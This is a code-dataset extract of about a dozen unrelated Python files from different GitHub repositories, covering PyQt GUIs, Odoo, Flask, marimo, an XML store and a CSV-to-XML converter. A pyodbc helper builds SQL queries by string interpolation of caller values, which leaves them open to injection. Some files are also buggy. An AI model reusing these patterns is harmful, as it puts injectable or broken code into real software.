'https://www.kucoin.com/trade/' + pairs_dict[0]['pair']\n elif pairs_dict[0]['exchange'] == 'TradeOgre':\n self.link1 = 'https://tradeogre.com/exchange/' + pairs_dict[0]['pair']\n else:\n self.pairs_elements[str(0)]['browser_button'].setDisabled(True)\n\n if pairs_dict[1]['exchange'] == 'KuCoin':\n self.link2 = 'https://www.kucoin.com/trade/' + pairs_dict[1]['pair']\n elif pairs_dict[1]['exchange'] == 'TradeOgre':\n self.link2 = 'https://tradeogre.com/exchange/' + pairs_dict[1]['pair']\n else:\n self.pairs_elements[str(1)]['browser_button'].setDisabled(True)\n\n if pairs_dict[2]['exchange'] == 'KuCoin':\n self.link3 = 'https://www.kucoin.com/trade/' + pairs_dict[2]['pair']\n elif pairs_dict[2]['exchange'] == 'TradeOgre':\n self.link3 = 'https://tradeogre.com/exchange/' + pairs_dict[2]['pair']\n else:\n self.pairs_elements[str(2)]['browser_button'].setDisabled(True)\n\n if pairs_dict[3]['exchange'] == 'KuCoin':\n self.link4 = 'https://www.kucoin.com/trade/' + pairs_dict[3]['pair']\n elif pairs_dict[3]['exchange'] == 'TradeOgre':\n self.link4 = 'https://tradeogre.com/exchange/' + pairs_dict[3]['pair']\n else:\n self.pairs_elements[str(3)]['browser_button'].setDisabled(True)\n\n self.browser_button1.clicked.connect(self.link1_pressed)\n self.browser_button2.clicked.connect(self.link2_pressed)\n self.browser_button3.clicked.connect(self.link3_pressed)\n self.browser_button4.clicked.connect(self.link4_pressed)\n\n self.actionOpen_settings_in_editor.triggered.connect(open_settings_in_editor)\n self.actionReload_app.triggered.connect(self.reload_app)\n\n self.tray_icon = 
QSystemTrayIcon(self)\n self.tray_icon.setIcon(QIcon(\"gui_icon.png\"))\n\n show_action = QAction(\"Show\", self)\n quit_action = QAction(\"Exit\", self)\n hide_action = QAction(\"Hide\", self)\n show_action.triggered.connect(self.show)\n hide_action.triggered.connect(self.hide)\n quit_action.triggered.connect(qApp.quit)\n tray_menu = QMenu()\n tray_menu.addAction(show_action)\n tray_menu.addAction(hide_action)\n tray_menu.addAction(quit_action)\n self.tray_icon.setContextMenu(tray_menu)\n self.tray_icon.show()\n\n def link1_pressed(self):\n webbrowser.open_new_tab(self.link1)\n\n def link2_pressed(self):\n webbrowser.open_new_tab(self.link2)\n\n def link3_pressed(self):\n webbrowser.open_new_tab(self.link3)\n\n def link4_pressed(self):\n webbrowser.open_new_tab(self.link4)\n\n def reload_app(self):\n self.close()\n\n def closeEvent(self, event):\n if self.settings_dict['window']['tray']:\n event.ignore()\n self.hide()\n\n if self.settings_dict['developer']['first_on_tray']:\n self.tray_icon.showMessage(\n \"CryptoChecker\",\n \"Application was minimized to tray\",\n QSystemTrayIcon.Information,\n 2000\n )\n self.config_sess.config_dict['developer']['first_on_tray'] = False\n self.config_sess.save_to_file()\n","repo_name":"z1qaw/CryptoChecker","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"10833920469","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nCreated on 2017年3月30日\n@author: Irony.\"[讽刺]\n@site: alyl.vip, orzorz.vip, irony.coding.me , irony.iask.in , mzone.iask.in\n@email: 892768447@qq.com\n@file: TestFontAwesome\n@description: \n'''\n\n__Author__ = \"By: Irony.\\\"[讽刺]\\nQQ: 892768447\\nEmail: 892768447@qq.com\"\n__Copyright__ = \"Copyright (c) 2017 Irony.\\\"[讽刺]\"\n__Version__ = \"Version 1.0\"\n\nimport glob\nimport os\nimport sys\n\nfrom PyQt5.QtGui import QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QLabel, QWidget, QGridLayout,\\\n QScrollArea\n\nfrom FontAwesome import FontAwesomes\n\n\nclass ScrollArea(QScrollArea):\n\n def __init__(self):\n super(ScrollArea, self).__init__()\n self.setWindowTitle(\"FontAwesome Fonts\")\n self.resize(800, 600)\n self.window = QWidget(self)\n self.setWidget(self.window)\n\n layout = QGridLayout(self.window)\n fonts = list(FontAwesomes.alls().items()) # 786个 131*6\n print(fonts)\n\n for row in range(131):\n for col in range(6):\n # print(row, col, row * 6 + col)\n layout.addWidget(QLabel(\": \".join(fonts[row * 6 + col]),\n self.window,\n font=QFont(\"FontAwesome\", 14)),\n row, col, 1, 1)\n\n def resizeEvent(self, event):\n super(ScrollArea, self).resizeEvent(event)\n self.window.resize(self.width(), self.height() * 4)\n\napp = QApplication(sys.argv)\n\nQFontDatabase.addApplicationFont(\"Fonts/FontAwesome/fontawesome-webfont.ttf\")\n\nwindow = ScrollArea()\n\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"weih1121/PyQT5Examples","sub_path":"字体测试/TestFontAwesome.py","file_name":"TestFontAwesome.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"26119218705","text":"from odoo import fields, api, tools, models, _\n\n\nclass PurchaseOrderInherit(models.Model):\n _inherit = \"purchase.order.line\"\n\n partner = fields.Char(string=\"Partner\")\n\n @api.onchange('product_id')\n def check_partner(self):\n for purchase in self:\n self.partner = 
purchase.partner_id.name\n\n product_obj = self.env[\"product.product\"].search([])\n res = {}\n for product in product_obj:\n if product.seller_ids.name.name == self.partner:\n domain = {'product_id': [(product.seller_ids.name.name, '=', self.partner)]}\n return {'domain': domain}\n return res\n\n","repo_name":"planetodooofficial/daywey_custom_module","sub_path":"daywey_custom_module/models/vendor_filter.py","file_name":"vendor_filter.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8520060405","text":"#!/usr/bin/python\n\n__author__ = 'bingli'\n\nimport csv\nimport os\nimport sys\nimport time\n\nnew_dir = 'converterLog'\ntags1 = ['summary', 'preconditions']\ntags2 = ['Regression', 'Smoke', 'Jira No.', 'Automated Test']\ntags3 = ['step_number', 'actions', 'expectedresults']\nspace = ' '\nspecial_char = {'<': '<', '>': '>', '&': '&', '\"': '"', \"'\": '''}\n\n\ndef pre_check(e):\n for k, v in special_char.items():\n e = e.replace(k, v)\n return e\n\n\ndef read_from_csv():\n csv_data = csv.reader(open(csvFile, 'rU')) # Open csv file\n ret_list = []\n invalid_list = []\n\n # Read from csv and append each valid line in to tem_list.\n for index, row in enumerate(csv_data):\n # If name > 100 char, then append the (line number, testcase, length) into invalid_list.\n if len(row[2]) > 100:\n invalid_list.append((index, row[2], len(row[2])))\n continue\n\n # If the row doesn't contain a test case name then this row is just a 'step' of the last test case.\n if row[2] == '':\n ret_list[-1].extend(row[-3:])\n\n # Otherwise, append the row into tem_list.\n else:\n ret_list.append(row)\n\n # If invalid_list not null, then write (line number, test case name, length) into a log file.\n if len(invalid_list) > 0:\n log_name = 'logFile_%s.txt' % time.time()\n curr_dir = os.path.dirname(os.path.abspath(__file__))\n dest_dir = os.path.join(curr_dir, new_dir)\n\n try:\n os.makedirs(dest_dir)\n except OSError:\n pass\n log_file = os.path.join(dest_dir, log_name)\n\n with open(log_file, 'w') as f:\n for item in invalid_list:\n f.write(','.join(str(i) for i in item) + '\\n')\n return ret_list\n\n\ndef write_to_xml():\n xmlData = open(xmlFile, 'w')\n xmlData.write('' + '\\n')\n xmlData.write('' + '\\n')\n\n data = read_from_csv()\n\n # Read from the second row.\n for row in data[1:]:\n xmlData.write('' + '\\n') # ... \n for i in tags1: # ['summary', 'preconditions']\n elem = pre_check(row.pop(2))\n elem_list = elem.split('\\n')\n xmlData.write(space + '<' + i + '>' + '' + k + '

    ' + '\\n')\n xmlData.write(space + ']]>' + '' + '\\n')\n\n num = 2\n xmlData.write(space + '' + '\\n')\n for i in tags2: # ['Regression', 'Smoke', 'Jira No.', 'Automated Test']\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space*num + '' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space + '' + '\\n')\n\n xmlData.write(space + '' + '\\n')\n for k in xrange(len(row)/3):\n xmlData.write(space*num + '' + '\\n')\n for i in tags3: # ['step_number', 'actions', 'expectedresults']\n xmlData.write(space*num + '<' + i + '>' + '' + '' + '\\n')\n xmlData.write(space*num + '' + '\\n')\n xmlData.write(space + '' + '\\n')\n xmlData.write('
    ' + '\\n')\n\n xmlData.write('
    ' + '\\n')\n xmlData.close()\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n csvFile = sys.argv[1] # 'OTC-8.csv', read from csv file\n xmlFile = sys.argv[2] # 'OTC-8.xml', output xml file\n else:\n csvFile = sys.argv[1] # take second argument\n xmlFile = csvFile.replace('csv', 'xml') # replace extension\n write_to_xml()","repo_name":"bingli88/TestLink_API_Python","sub_path":"csvConverter.py","file_name":"csvConverter.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72922182324","text":"# 문제 링크: https://leetcode.com/problems/construct-string-from-binary-tree/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def tree2str(self, root: Optional[TreeNode]) -> str:\n if not root:\n return ''\n\n tree_str = str(root.val)\n if root.left:\n tree_str += '(' + self.tree2str(root.left) + ')'\n if root.right:\n if not root.left:\n tree_str += '()'\n tree_str += '(' + self.tree2str(root.right) + ')'\n\n return tree_str\n","repo_name":"jamesujeon/coding-problem-solutions","sub_path":"leetcode/python 3/606.py","file_name":"606.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4083707105","text":"from __future__ import annotations\nfrom dataclasses import dataclass, fields\n\nimport marimo as mo\nfrom gfosd import components as gfc\n\n\n@dataclass\nclass Components:\n UNIFORMLY_SMALL: str = \"Small, Uniformly\"\n SPARSE_SMALL: str = \"Small, Sparse\"\n ASYMMETRIC_SMALL: str = \"Small, Asymmetrically\"\n SMOOTH: str = \"Smooth\"\n PERIODIC: str = \"Periodic\"\n PIECEWISE_CONSTANT: str = \"Piecewise Constant\"\n TREND_LINE: str = \"Trend-line\"\n AGGREGATE: str = \"Aggregate\"\n AVERAGE_EQUAL: str = \"Average Equal\"\n CONSTANT: str = \"Constant\"\n FIRST_VALUE_FIXED: str = \"First Value Fixed\"\n\n\n@dataclass\nclass ResidualComponents:\n UNIFORMLY_SMALL: str = Components.UNIFORMLY_SMALL\n SPARSE_SMALL: str = Components.SPARSE_SMALL\n ASYMMETRIC_SMALL: str = Components.ASYMMETRIC_SMALL\n\n\ndef _sorted(collection) -> list:\n return list(sorted(collection))\n\n\nRESIDUAL_COMPONENTS = _sorted([e.default for e in fields(ResidualComponents)])\nCOMPONENT_LIBRARY = _sorted([e.default for e in fields(Components)])\n\n\n@dataclass\nclass Parameters:\n PERIOD: str = \"period\"\n WEIGHT: str = \"weight\"\n THRESHOLD: str = \"threshold\"\n COMPONENTS: str = \"components\"\n FIRST_VALUE: str = \"first value\"\n AVERAGE: str = \"average\"\n CHILDREN: str = \"children\"\n\n\nPARAMETER_UNIVERSE = {\n Parameters.PERIOD: [Components.PERIODIC],\n Parameters.WEIGHT: [\n Components.SMOOTH,\n Components.PIECEWISE_CONSTANT,\n ],\n Parameters.THRESHOLD: [ResidualComponents.ASYMMETRIC_SMALL],\n Parameters.COMPONENTS: [Components.AGGREGATE],\n Parameters.FIRST_VALUE: [Components.FIRST_VALUE_FIXED],\n Parameters.AVERAGE: [Components.AVERAGE_EQUAL],\n}\n\nPARAMETER_DEFAULTS = {\n Parameters.PERIOD: [182, lambda v: mo.ui.slider(1, 365, step=1, value=v)],\n Parameters.WEIGHT: [0, lambda v: mo.ui.slider(-3, 3, value=v)],\n Parameters.THRESHOLD: [\n 0.5,\n lambda v: mo.ui.slider(0, 1, step=0.05, value=v),\n ],\n Parameters.COMPONENTS: [2, lambda v: mo.ui.number(1, 5, step=1, value=v)],\n Parameters.FIRST_VALUE: [\n 0,\n lambda v: mo.ui.number(-100, 100, step=1, value=v),\n ],\n 
Parameters.AVERAGE: [\n 0,\n lambda v: mo.ui.number(-100, 100, step=1, value=v),\n ],\n}\n\n\ndef parameter_controls(\n component: Components | ResidualComponents, default_values\n) -> mo.ui.dictionary:\n params = {}\n for param in PARAMETER_UNIVERSE:\n if component in PARAMETER_UNIVERSE[param]:\n v, ctor = PARAMETER_DEFAULTS[param]\n try:\n v = default_values[param]\n except KeyError:\n pass\n params[param] = ctor(v)\n return mo.ui.dictionary(params, label=f\"{component}\")\n\n\ndef construct_component(name, parameters, center_periodic=False):\n if name == Components.UNIFORMLY_SMALL:\n return gfc.SumSquare(weight=1)\n elif name == Components.SPARSE_SMALL:\n return gfc.SumAbs(weight=1)\n elif name == Components.ASYMMETRIC_SMALL:\n return gfc.SumQuantile(weight=1, tau=parameters[Parameters.THRESHOLD])\n elif name == Components.SMOOTH:\n return gfc.SumSquare(\n diff=2, weight=10 ** parameters[Parameters.WEIGHT]\n )\n elif name == Components.PIECEWISE_CONSTANT:\n return gfc.SumAbs(diff=1, weight=10 ** parameters[Parameters.WEIGHT])\n elif name == Components.CONSTANT:\n return gfc.NoSlope()\n elif name == Components.PERIODIC:\n if center_periodic:\n return gfc.Aggregate(\n [\n gfc.Periodic(period=parameters[Parameters.PERIOD]),\n gfc.AverageEqual(0),\n ]\n )\n else:\n return gfc.Periodic(period=parameters[Parameters.PERIOD])\n elif name == Components.FIRST_VALUE_FIXED:\n return gfc.FirstValEqual(parameters[Parameters.FIRST_VALUE])\n elif name == Components.AVERAGE_EQUAL:\n return gfc.AverageEqual(parameters[Parameters.AVERAGE])\n elif name == Components.TREND_LINE:\n return gfc.NoCurvature()\n elif name == Components.AGGREGATE:\n components = [\n construct_component(name, params)\n for name, params in parameters[Parameters.CHILDREN]\n ]\n if components:\n return gfc.Aggregate(components)\n else:\n return None\n elif name is None:\n return None\n else:\n raise ValueError(\"Unknown component \", name)\n","repo_name":"marimo-team/marimo","sub_path":"examples/optimization/signals/modules/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":521,"dataset":"github-code","pt":"76"} +{"seq_id":"22522591790","text":"from flask import Flask, render_template, request\nfrom random import randint\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index() -> None:\n return render_template(\"index.html\")\n\n\n@app.route(\"/rolld\", methods=[\"GET\"])\ndef roll(num, dice) -> None:\n count = 0\n result = 0\n while count < num:\n result += randint(1, dice)\n count += 1\n score = str(result)\n num_string = str(num)\n dice_string = str(dice)\n score_string = str(score)\n f = open(\"scores.txt\", \"a\")\n f.write(f\"\\n{num_string}d{dice_string} => {score_string}\\n\")\n f.close()\n return render_template(\"roll.html\", num_string=num_string, dice_string=dice_string, score_string=score_string)\n\n\nif __name__ == \"__main__\":\n app.run(port=8080)","repo_name":"sammi-turner/Python-Examples","sub_path":"flask_dice_roller/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9071609939","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 6 15:22:27 2017\r\n\r\n@author: mechd\r\n\"\"\"\r\n\r\ndef OSWPI(Mf1, rhof1, Tf1, gamma, R, delta, n, tol):\r\n# OSWPI(1.5, 1.273, 300, 1.4, 286.9, 0.161443, 1000000, 1e-3)\r\n# OSWPI(2.75, 0.123, 114.317, 1.4, 287, 0.135263, 10000000, 1e-3)\r\n import 
numpy as np\r\n import matplotlib.pyplot as plt\r\n for i in range(n):\r\n sigma = i*np.pi/n\r\n Pf1 = rhof1*R*Tf1\r\n Mfn1 = Mf1*np.sin(sigma)\r\n Pf2 = Pf1*(2*gamma*Mfn1**2/(gamma+1) - ((gamma-1)/(gamma+1)))\r\n Tf2 = Tf1*((1 + 0.5*(gamma-1)*Mfn1**2)*(2*gamma*Mfn1**2/(gamma-1) - 1)*2*(gamma-1)/((gamma+1)**2*Mfn1**2))\r\n rhof2 = rhof1*(Pf2*Tf1)/(Pf1*Tf2)\r\n vfn1 = Mfn1*np.sqrt(gamma*R*Tf1)\r\n vfn2 = vfn1*rhof1/rhof2\r\n vf1 = vfn1/np.sin(sigma)\r\n vf2 = vfn2/np.sin(sigma-delta)\r\n vft1 = vf1*np.cos(sigma)\r\n vft2 = vf2*np.cos(sigma-delta)\r\n Mfn2 = vfn2/np.sqrt(gamma*R*Tf2)\r\n Mf2 = Mfn2/np.sin(sigma-delta)\r\n Mft1 = Mf1*np.cos(sigma)\r\n Mft2 = Mf2*np.cos(sigma-delta)\r\n PT1 = Pf1/(gamma-1) + 0.5*vf1**2/rhof1\r\n PT2 = Pf2/(gamma-1) + 0.5*vf2**2/rhof2\r\n if abs(vft1-vft2) <= tol and Pf2 > Pf1:\r\n# return Pf1, Mfn1, Pf2, Tf2, rhof2, vfn1, vfn2, \r\n# vf1, vf2, vft1, vft2, sigma, Mfn2, Mf2, Mft1, Mft2, PT1, PT2\r\n print('Pf1=', Pf1, '\\nvf1=', vf1, '\\nPf2=', Pf2, '\\nTf2=', \r\n Tf2,'\\nrhof1=', rhof1, '\\nrhof2=', rhof2, '\\nrhof1inv=', \r\n 1/rhof1, '\\nrhof2inv=', 1/rhof2, '\\nvf2=', vf2, '\\nMf2=', Mf2)\r\n print('vfn1=', vfn1, '\\nvfn2=', vfn2, '\\nMfn2=', Mfn2, '\\nvft1=', \r\n vft1, '\\nvft2=', vft2, '\\nMft2=', Mft2, '\\nMft1=', \r\n Mft1, '\\nPT1=', PT1, '\\nPT2=', PT2, '\\nsigma=', sigma,\r\n '\\nsigma_degrees=', 180*sigma/np.pi, '\\npi_sigma=', np.pi/sigma)\r\n print('-------------------------------------------------------')\r\n\r\n return\r\n\r\n","repo_name":"kalagotla/python-scripts","sub_path":"OSWPI.py","file_name":"OSWPI.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31890255856","text":"from mySecrets import connectStr\nimport json\nimport pyodbc\n\nDATABASE_USERACCOUNTS = \"[dbo].[UserAccounts]\"\nDATABASE_PROBLEMS = \"[dbo].[Problems]\"\nDATABASE_SUBMISSIONS = \"[dbo].[Submissions]\"\n\n\ndef executeCommandCommit(cmd: str) -> None:\n cnxn = pyodbc.connect(connectStr)\n cursor = cnxn.cursor()\n cursor.execute(cmd)\n cursor.commit()\n cnxn.close()\n\n\ndef executeCommandFetchAll(cmd: str) -> list:\n cnxn = pyodbc.connect(connectStr)\n cursor = cnxn.cursor()\n cursor.execute(cmd)\n arr = cursor.fetchall()\n cnxn.close()\n return arr\n\n\ndef ACCOUNT_getUniqueIDNumber() -> int:\n return executeCommandFetchAll(f\"SELECT MAX(AccountID) FROM {DATABASE_USERACCOUNTS}\")[0][0] + 1\n\n\ndef ACCOUNT_createAccount(firstName: str, lastName: str) -> None:\n id = ACCOUNT_getUniqueIDNumber()\n\n executeCommandCommit(f\"INSERT INTO {DATABASE_USERACCOUNTS} VALUES ({id}, '{firstName}', '{lastName}')\")\n\n\ndef PROBLEMS_getProblemsListString() -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemName, Difficulty FROM {DATABASE_PROBLEMS}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][2] = str(arr[i][2])\n return arr\n\n\ndef PROBLEMS_getProblemString(problemID: int) -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemName, ProblemDescription, ProblemInput, ProblemOutput, ProblemExampleInput, ProblemExampleOutput, TimeLimit, MemoryLimit, Difficulty FROM {DATABASE_PROBLEMS} WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][7] = str(arr[i][7])\n arr[i][8] = str(arr[i][8])\n arr[i][9] = str(arr[i][9])\n for k in range(len(arr[i])):\n arr[i][k] = arr[i][k].replace(\"\\\\n\", \"\\n\")\n\n return arr\n\n\ndef PROBLEMS_getProblemNameString(problemID: int) -> list:\n arr 
= executeCommandFetchAll(f\"SELECT ProblemID, ProblemName FROM {DATABASE_PROBLEMS} WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n\n return arr\n\n\ndef PROBLEMS_getProblemTest(problemID: int) -> list:\n arr = executeCommandFetchAll(f\"SELECT ProblemID, ProblemRunInput, ProblemRunOutput, ProblemRunCheckFunction, TimeLimit, MemoryLimit, Difficulty FROM {DATABASE_PROBLEMS} WHERE ProblemID={str(problemID)}\")\n\n for i in range(len(arr)):\n for k in range(1, 3):\n arr[i][k] = arr[i][k].replace(\"\\\\n\", \"\\n\")\n\n return arr\n\n\ndef SUBMISSIONS_getUniqueIDNumber() -> int:\n return executeCommandFetchAll(f\"SELECT MAX(submissionId) FROM {DATABASE_SUBMISSIONS}\")[0][0] + 1\n\n\ndef SUBMISSIONS_createSubmission(submissionUserId: int, submissionProblemId: int, submissionCompiler: str, submissionCode: str, submissionOutput: str, submissionStatus: int) -> str:\n submissionId = SUBMISSIONS_getUniqueIDNumber()\n\n submissionCode = json.dumps(submissionCode)\n submissionCode = submissionCode.replace(\"'\", \"''\")\n\n submissionOutput = json.dumps(submissionOutput)\n submissionOutput = submissionOutput.replace(\"'\", \"''\")\n\n executeCommandCommit(f\"INSERT INTO {DATABASE_SUBMISSIONS} (SubmissionID, SubmissionUserID, SubmissionProblemID, SubmissionCompiler, SubmissionCode, SubmissionOutput, SubmissionStatus) VALUES ({str(submissionId)}, {str(submissionUserId)}, {str(submissionProblemId)}, '{submissionCompiler}', '{submissionCode}', '{submissionOutput}', {str(submissionStatus)})\")\n\n return str(submissionId)\n\n\ndef SUBMISSIONS_getSubmissionString(submissionId: int):\n arr = executeCommandFetchAll(f\"SELECT SubmissionID, SubmissionUserID, SubmissionProblemID, SubmissionCode, SubmissionStatus, SubmissionCompiler FROM {DATABASE_SUBMISSIONS} WHERE SubmissionID={str(submissionId)}\")\n\n for i in range(len(arr)):\n arr[i][0] = str(arr[i][0])\n arr[i][1] = str(arr[i][1])\n arr[i][2] = str(arr[i][2])\n arr[i][3] = json.loads(arr[i][3])\n\n return arr\n\n\n# if __name__ == \"__main__\":\n# # print(ACCOUNT_getUniqueIDNumber())\n\n# # print(PROBLEMS_getProblemsListString())\n# # print(PROBLEMS_getProblemString(1))\n\n# # print(\"'\" == \"\\'\")\n\n# SUBMISSIONS_createSubmission(2, 3, \"python3\", \"\"\"Some cool code\"\"\", \"out\", 1500)\n# print(SUBMISSIONS_getSubmissionString(3))\n\n# # ACCOUNT_createAccount(\"Danny\", \"Kaja\")\n\n# # a = executeCommandFetchAll(f\"SELECT TOP (1000) * FROM {DATABASE_USERACCOUNTS}\")\n# # print(a)\n","repo_name":"robotgenis/CPCRunner","sub_path":"mySQLDatabase.py","file_name":"mySQLDatabase.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36410246718","text":"from xml.dom import minidom\nimport time\nimport math\nimport os\nimport random\nimport hashlib\n\nclass Xmldb:\n \"class to store database information in xml file\"\n\n def __init__(self, fname):\n self.fname = fname\n if not os.path.exists(fname):\n #create document root\n xmlstr = u\"\"\n else:\n #the hack is needed because minidom adds extra whitespaces in file\n xmlstr = \"\"\n with open(fname,\"r\") as f:\n for line in f:\n xmlstr += line.strip(\"\\t\\n\")\n\n try:\n self.doc = minidom.parseString(xmlstr)\n except Exception:\n print(\"found empty xmldb, creating new one\")\n self.doc = minidom.parseString(u\"\")\n\n self.root = self.doc.firstChild\n\n def close(self):\n with open(self.fname, \"w\") as f:\n f.write(self.doc.toprettyxml(\"\\t\", 
\"\\n\").encode('utf-8'))\n\n def getMaxID(self):\n root_max_id = self.root.getAttribute('maxid')\n if(root_max_id):\n new_id = int(root_max_id)\n else:\n new_id = len(self.doc.getElementsByTagName(\"record\"))\n \n return new_id\n\n\n def setMaxID(self, new_id):\n self.root.setAttribute(u'maxid', str(new_id))\n\n def generateLabel(self):\n timestamp = math.floor(time.time())\n\n #we suggest that this method always generate unique values\n return hashlib.md5(str(timestamp*random.random())).hexdigest()[-5:]\n\n def addRecord(self, label, fname, files):\n new_id = self.getMaxID() + 1\n self.setMaxID(new_id)\n\n timestamp = math.floor(time.time())\n\n #generate node for new record\n new_node = self.doc.createElement(u\"record\")\n new_node.setAttribute(u'id', str(new_id))\n new_node.setAttribute(u'date', str(int(timestamp)))\n new_node.setAttribute(u'label', label)\n new_node.setAttribute(u'dlcount', '0')\n new_node.setAttribute(u'fname', fname.decode(\"utf-8\"))\n\n for fname in files:\n fnode = self.doc.createElement(u\"file\")\n fnode.setAttribute(u\"name\", os.path.basename(fname).decode(\"utf-8\"))\n fnode.setAttribute(u\"origpath\", os.path.dirname(fname).decode(\"utf-8\"))\n new_node.appendChild(fnode)\n \n self.root.appendChild(new_node)\n\n def delRecord(self, id):\n nodes = self.root.getElementsByTagName('record')\n\n for el in nodes:\n if(el.getAttribute('id') == id):\n self.root.removeChild(el)\n return\n\n def delAllRecords(self):\n nodes = self.root.getElementsByTagName('record')\n\n for el in nodes:\n self.removeChild(el)\n\n def getRecordsList(self, searchId = None):\n \"return dictionary with records\"\n res = {}\n\n def makeFname(origPath, fname):\n sep = \"/\" if len(origPath) > 0 else \"\"\n\n return origPath + sep + fname\n\n for el in self.root.getElementsByTagName(\"record\"):\n id = el.getAttribute(\"id\")\n\n hash = {\n \"id\" : id,\n \"label\" : el.getAttribute(\"label\"),\n \"downloadNum\": el.getAttribute(\"dlcount\"),\n \"fname\": el.getAttribute(\"fname\"),\n \"files\": [ makeFname(fel.getAttribute('origpath'), fel.getAttribute(\"name\")) for fel in el.getElementsByTagName(\"file\") ]\n }\n\n if searchId != None and searchId == id:\n obj = {}\n obj[id] = hash\n return obj\n else:\n res[ id ] = hash\n\n if searchId != None:\n return None\n else:\n return res\n\n def getFile(self, id):\n #log.debug(\"searching for id = %s\" % id)\n fid = str(id).strip()\n if (len(fid) != 5): #all ids are exactly 5 chars long\n return None\n\n for rec in self.root.getElementsByTagName('record'):\n testid = rec.getAttribute('label')\n #log.debug(\"testid = %s\" % testid)\n if testid == fid:\n count = int(rec.getAttribute('dlcount')) + 1\n fname = rec.getAttribute('fname')\n rec.setAttribute('dlcount', str(count))\n\n return fname\n return None\n","repo_name":"can3p/share","sub_path":"frontend/fs/model/xmldb.py","file_name":"xmldb.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71218396724","text":"import os;\nimport os.path as osp;\n\n# list of all sconscript files\n# ORDER-SENSITIVE!\n# add your sconscript only AFTER all dependent\nall_ss = [\n\t\t'utils/SConscript',\n\t\t'alg/SConscript',\n\t\t'ga_client/SConscript',\n\t\t'gis_neuro/SConscript'\n\t\t]\n\n# process custom settings\ncustom_env = Environment(ENV = os.environ);\n\nvars = Variables();\nvars.Add('debug', 'Set to 1 to build debug version of hybrid_adapt libs', '1');\nvars.Add('release', 'Set to 1 to build release 
version of hybrid_adapt libs', '0');\nvars.Add('bs', 'Set to 1 to build BlueSky compatibility layer', '1');\nvars.Add('python_name', 'Specify actual Python interpreter name (with version)', 'python2.7');\nvars.Update(custom_env);\n# try to change def value of build variable\n#custom_env.Replace(debug = 0);\n\n# use distributed compilation\n#custom_env['CC'] = ['distcc'];\n#custom_env['CXX'] = ['distcc'];\ncustom_env.Append(\n\tCCFLAGS = ['-W', '-Wall', '-Wno-deprecated', '-Werror=return-type', '-pthread'], #'-fvisibility=hidden', '-fvisibility-inlines-hidden'],\n\tCPPPATH = [[os.environ['BOOST_PATH']], '#utils', '#utils/include', '#alg/include', '/usr/include/${python_name}'],\n\tLIBPATH = ['/home/uentity/lib/boost/lib'],\n\tRPATH = ['/home/uentity/lib/boost/lib'],\n\tCPPDEFINES = ['UNIX', 'PYTHON_VERSION=27']\n);\n\nif custom_env[\"bs\"] == '1' :\n\tcustom_env.Append(\n\t\tCPPDEFINES = [\n\t\t\t'BLUE_SKY_COMPAT', 'BS_EXPORTING_PLUGIN', 'BSPY_EXPORTING_PLUGIN',\n\t\t\t'PYTHON_VERSION=27', 'BS_EXCEPTION_USE_BOOST_FORMAT', 'BS_DISABLE_MT_LOCKS'\n\t\t],\n\t\tCPPPATH = [\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'kernel', 'include'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'kernel', 'include', 'python'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'plugins', 'bs-eagle', 'bs_bos_core_base', 'include')\n\t\t],\n\t\tLIBPATH = [\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'exe', 'debug'),\n\t\t\tosp.join(os.environ['BLUE_SKY_PATH'], 'exe', 'release')\n\t\t],\n\t);\n\nExport('custom_env');\n# generate variables help\nHelp(vars.GenerateHelpText(custom_env));\n\n#print('debug option is: ', custom_env['debug']);\n#print('subst debug option is: ', custom_env.subst('${debug}'));\n#print('release option is: ', custom_env['release']);\n#print('subst release option is: ', custom_env.subst('${release}'));\n\n# Add options telling whether to build release and debug\n# build debug by default\n#AddOption('--ha_debug', dest='ha_debug', help='Set to 1 for building debug', type = 'int', 